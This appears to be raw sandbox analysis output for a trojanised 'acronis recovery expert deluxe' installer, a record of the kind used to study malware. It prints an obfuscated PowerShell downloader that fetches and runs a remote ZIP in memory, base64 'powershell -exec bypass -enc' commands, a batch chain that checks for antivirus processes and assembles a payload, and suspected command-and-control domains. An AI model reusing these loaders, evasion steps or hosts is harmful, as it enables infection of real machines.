                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: Base64 decoded .((GET-vaRIABLe '*Mdr*').naMe[3,11,2]-joIn'') ((('SEt-vaRIaBle (6Sv8ma6Sv+6SvFZ6Sv) ( [TYp'+'E](6Sv{2}{0}{3}{4}{1}6Sv-FlTVelTV,lT'+'VINlTV,lTVSy'+'STlTV,lTVm.iolTV,lTV.SeEKoRIGlTV)); sEt-ITeM Variable:8APc ( [Type](6Sv{1}{2}{0}'+'6Sv -F lTVDlTV,lTVSYslTV,lTVtEM.gU'+'IlT'+'V) ) ; sV cg0'+'q ( [tYPe](6Sv{3}{0}{1}{4}{2}6Sv -FlTVteM.iO'+'lTV,lTV.PlTV,lTVhlTV,lTVSYSlTV,lTVAT'+'lTV))'+' ; Set-Vari'+'able -Name uB2gt -Value ([TYPe](6Sv{1}{2}{0}{3}6Sv -f lTVEm.I'+'O.FlTV,lTVSylTV,lTVSTlTV,lTVILElTV)) ; Set-Variable -Name scRIPTBLOCk -Value ({ '+' Set-Variable -Name ZIPURl -Value (6Sv{3}{7}{6}{4}{9}{1}{10}{8}{0}{5}{2}6Sv -flTVtl'+'TV,lTVp/l'+'TV,lTVtxtlTV,lTVhtlTV,lTViptedelTV,lTV_clp_pan.lTV,lTVs://kllTV,lTVtplTV,lTVnlTV,lTVhoa.sh'+'olTV,lTVilTV) Set-Variable -Name wEBclIENt -Value (.(6Sv{1}{2}{0}6Sv -flTVjectlTV,lTVNewlTV,lTV-OblTV) (6Sv{1}{0}{2}{3}6Sv-f lTVet.WlTV,lTVSys'+'tem.NlTV,lTVelTV,lTV'+'bClientlTV))'+' Set-Variab'+'le -Name ZiPdatA -Value'+' (DyE{weBUmBCLBUmIEnT}.(6Sv{3}{1}{0}{2}6Sv -flTVatlTV,lTVadDlTV,lTValTV,lTVDownlolTV).Invoke('+'DyE{zBUmIPBUmUrl})'+') '+' Set-Variable -Name MEMoRy'+'STrEAm -Value (&(6Sv{2}{1}{0}6Sv-f lTVec'+'tlTV,lTVObjlTV,lTVNew-lTV) (6Sv{2}{3}{1}'+'{0}6Sv-f lTV'+'amlTV,lTVStrelTV,lTVSyslTV,lTVtem.IO.MemorylTV)) DyE{MemBUmorySTrBUmeam}.(6Sv{0}{1}6Sv -flTVWlTV,l'+'TVritelTV).Invo'+'ke(DyE{ZIBUmpDaTA}, 0, DyE{ZiPBUmDBUmAta}.6SvlenGBUmTH6Sv) DyE{mEmORBUmYBUmStBUmREBUmAM}.6SvsB'+'UmEe'+'k6Sv(0, (VARIABLE (6Sv8mA6Sv+6SJump to behavior
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeNtQuerySystemInformation: Direct from: 0x59102166
                Source: Palestine.com, 00000011.00000003.1459687507.000000000493E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shearhoaxx.click
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "GERMANY" False Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming DJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com DJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com Palestine.com D
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe "C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpProcess created: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -enc lgaoacgarwbfafqalqb2ageaugbjaeeaqgbmaguaiaanacoatqbkahiakganackalgbuageatqblafsamwasadeamqasadiaxqatagoabwbjag4ajwanackaiaaoacgakaanafmarqb0ac0adgbhafiasqbhaeiabablacaakaa2afmadga4ag0ayqa2afmadgaradyauwb2aeyawga2afmadgapacaaiaaoacaawwbuafkacaanacsajwbfaf0akaa2afmadgb7adiafqb7adaafqb7admafqb7adqafqb7adeafqa2afmadgataeyababuafyazqbsafqavgasagwavaanacsajwbwaekatgbsafqavgasagwavabwafmaeqanacsajwbtafqababuafyalabsafqavgbtac4aaqbvagwavabwacwababuafyalgbtaguarqblag8augbjaecababuafyakqapadsaiabzaeuadaataekavablae0aiaagafyayqbyagkayqbiagwazqa6adgaqqbqagmaiaagacgaiabbafqaeqbwaguaxqaoadyauwb2ahsamqb9ahsamgb9ahsamab9accakwanadyauwb2acaalqbgacaababuafyarabsafqavgasagwavabwafmawqbzagwavabwacwababuafyadabfae0algbnafuajwaraccasqbsafqajwaraccavgapacaaiaapacaaowagahmavgagagmazwawaccakwanaheaiaaoacaawwb0afkauablaf0akaa2afmadgb7admafqb7adaafqb7adeafqb7adqafqb7adiafqa2afmadgagac0argbsafqavgb0aguatqauagkatwanacsajwbsafqavgasagwavabwac4auabsafqavgasagwavabwaggababuafyalabsafqavgbtafkauwbsafqavgasagwavabwaeeavaanacsajwbsafqavgapackajwaraccaiaa7acaauwblahqalqbwageacgbpaccakwanageaygbsaguaiaatae4ayqbtaguaiab1aeiamgbnahqaiaatafyayqbsahuazqagacgawwbuafkauablaf0akaa2afmadgb7adeafqb7adiafqb7adaafqb7admafqa2afmadgagac0azgagagwavabwaeuabqauaekajwaraccatwauaeyababuafyalabsafqavgbtahkababuafyalabsafqavgbtafqababuafyalabsafqavgbjaewarqbsafqavgapackaiaagadsaiabtaguadaatafyayqbyagkayqbiagwazqagac0atgbhag0azqagahmaywbsaekauabuaeiatabpaemaawagac0avgbhagwadqblacaakab7aaoaiaanacsajwagacaaiabtaguadaatafyayqbyagkayqbiagwazqagac0atgbhag0azqagafoasqbqafuaugbsacaalqbwageabab1aguaiaaoadyauwb2ahsamwb9ahsanwb9ahsangb9ahsanab9ahsaoqb9ahsamqb9ahsamqawah0aewa4ah0aewawah0aewa1ah0aewayah0angbtahyaiaatagyababuafyadabsaccakwanafqavgasagwavabwahaalwbsaccakwanafqavgasagwavabwahqaeab0agwavabwacwababuafyaaab0agwavabwacwababuafyaaqbwahqazqbkaguababuafyalabsafqavgbfagmababwaf8acabhag4algbsafqavgasagwavabwahmaogavac8aawbsagwavabwacwababuafyadabwagwavabwacwababuafyabgbsafqavgasagwavabwaggabwbhac4acwboaccakwanag8ababuafyalabsafqavgbpagwavabwackacgagacaaiaagafmazqb0ac0avgbhahiaaqbhagiabablacaalqboageabqblacaadwbfaeiaywbsaekarqboahqaiaatafyayqbsahuazqagacgalgaoadyauwb2ahsamqb9ahsamgb9ahsamab9adyauwb2acaalqbmagwavabwagoazqbjahqababuafyalabsafqavgboaguadwbsafqavgasagwavabwac0atwbiagwavabwackaiaaoadyauwb2ahsamqb9ahsamab9ahsamgb9ahsamwb9adyauwb2ac0azgagagwavabwaguadaauafcababuafyalabsafqavgbtahkacwanacsajwb0aguabqauae4ababuafyalabsafqavgblagwavabwacwababuafyajwaraccaygbdagwaaqblag4adabsafqavgapackacganacsajwagacaaiaagafmazqb0ac0avgbhahiaaqbhagiajwaraccabablacaalqboageabqblacaawgbpafaazabhahqaqqagac0avgbhagwadqblaccakwanacaakabeahkarqb7ahcazqbcafuabqbcaematabcafuabqbjaeuabgbuah0algaoadyauwb2ahsamwb9ahsamqb9ahsamab9ahsamgb9adyauwb2acaalqbmagwavabwageadabsafqavgasagwavabwageazabeagwavabwacwababuafyayqbsafqavgasagwavabwaeqabwb3ag4ababvagwavabwackalgbjag4adgbvagsazqaoaccakwanaeqaeqbfahsaegbcafuabqbjafaaqgbvag0avqbyagwafqapaccakwanackac
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -enc lgaoacgarwbfafqalqb2ageaugbjaeeaqgbmaguaiaanacoatqbkahiakganackalgbuageatqblafsamwasadeamqasadiaxqatagoabwbjag4ajwanackaiaaoacgakaanafmarqb0ac0adgbhafiasqbhaeiabablacaakaa2afmadga4ag0ayqa2afmadgaradyauwb2aeyawga2afmadgapacaaiaaoacaawwbuafkacaanacsajwbfaf0akaa2afmadgb7adiafqb7adaafqb7admafqb7adqafqb7adeafqa2afmadgataeyababuafyazqbsafqavgasagwavaanacsajwbwaekatgbsafqavgasagwavabwafmaeqanacsajwbtafqababuafyalabsafqavgbtac4aaqbvagwavabwacwababuafyalgbtaguarqblag8augbjaecababuafyakqapadsaiabzaeuadaataekavablae0aiaagafyayqbyagkayqbiagwazqa6adgaqqbqagmaiaagacgaiabbafqaeqbwaguaxqaoadyauwb2ahsamqb9ahsamgb9ahsamab9accakwanadyauwb2acaalqbgacaababuafyarabsafqavgasagwavabwafmawqbzagwavabwacwababuafyadabfae0algbnafuajwaraccasqbsafqajwaraccavgapacaaiaapacaaowagahmavgagagmazwawaccakwanaheaiaaoacaawwb0afkauablaf0akaa2afmadgb7admafqb7adaafqb7adeafqb7adqafqb7adiafqa2afmadgagac0argbsafqavgb0aguatqauagkatwanacsajwbsafqavgasagwavabwac4auabsafqavgasagwavabwaggababuafyalabsafqavgbtafkauwbsafqavgasagwavabwaeeavaanacsajwbsafqavgapackajwaraccaiaa7acaauwblahqalqbwageacgbpaccakwanageaygbsaguaiaatae4ayqbtaguaiab1aeiamgbnahqaiaatafyayqbsahuazqagacgawwbuafkauablaf0akaa2afmadgb7adeafqb7adiafqb7adaafqb7admafqa2afmadgagac0azgagagwavabwaeuabqauaekajwaraccatwauaeyababuafyalabsafqavgbtahkababuafyalabsafqavgbtafqababuafyalabsafqavgbjaewarqbsafqavgapackaiaagadsaiabtaguadaatafyayqbyagkayqbiagwazqagac0atgbhag0azqagahmaywbsaekauabuaeiatabpaemaawagac0avgbhagwadqblacaakab7aaoaiaanacsajwagacaaiabtaguadaatafyayqbyagkayqbiagwazqagac0atgbhag0azqagafoasqbqafuaugbsacaalqbwageabab1aguaiaaoadyauwb2ahsamwb9ahsanwb9ahsangb9ahsanab9ahsaoqb9ahsamqb9ahsamqawah0aewa4ah0aewawah0aewa1ah0aewayah0angbtahyaiaatagyababuafyadabsaccakwanafqavgasagwavabwahaalwbsaccakwanafqavgasagwavabwahqaeab0agwavabwacwababuafyaaab0agwavabwacwababuafyaaqbwahqazqbkaguababuafyalabsafqavgbfagmababwaf8acabhag4algbsafqavgasagwavabwahmaogavac8aawbsagwavabwacwababuafyadabwagwavabwacwababuafyabgbsafqavgasagwavabwaggabwbhac4acwboaccakwanag8ababuafyalabsafqavgbpagwavabwackacgagacaaiaagafmazqb0ac0avgbhahiaaqbhagiabablacaalqboageabqblacaadwbfaeiaywbsaekarqboahqaiaatafyayqbsahuazqagacgalgaoadyauwb2ahsamqb9ahsamgb9ahsamab9adyauwb2acaalqbmagwavabwagoazqbjahqababuafyalabsafqavgboaguadwbsafqavgasagwavabwac0atwbiagwavabwackaiaaoadyauwb2ahsamqb9ahsamab9ahsamgb9ahsamwb9adyauwb2ac0azgagagwavabwaguadaauafcababuafyalabsafqavgbtahkacwanacsajwb0aguabqauae4ababuafyalabsafqavgblagwavabwacwababuafyajwaraccaygbdagwaaqblag4adabsafqavgapackacganacsajwagacaaiaagafmazqb0ac0avgbhahiaaqbhagiajwaraccabablacaalqboageabqblacaawgbpafaazabhahqaqqagac0avgbhagwadqblaccakwanacaakabeahkarqb7ahcazqbcafuabqbcaematabcafuabqbjaeuabgbuah0algaoadyauwb2ahsamwb9ahsamqb9ahsamab9ahsamgb9adyauwb2acaalqbmagwavabwageadabsafqavgasagwavabwageazabeagwavabwacwababuafyayqbsafqavgasagwavabwaeqabwb3ag4ababvagwavabwackalgbjag4adgbvagsazqaoaccakwanaeqaeqbfahsaegbcafuabqbjafaaqgbvag0avqbyagwafqapaccakwanackacJump to behavior
                Source: Palestine.com, 00000011.00000000.1281472018.0000000000BB3000.00000002.00000001.01000000.00000009.sdmp, Palestine.com, 00000011.00000003.1466749906.000000000514E000.00000004.00000800.00020000.00000000.sdmp, electronics.exe, 00000043.00000000.2221093128.0000000000331000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Progmanj
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Shell_TrayWndjh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456.zip VolumeInformation
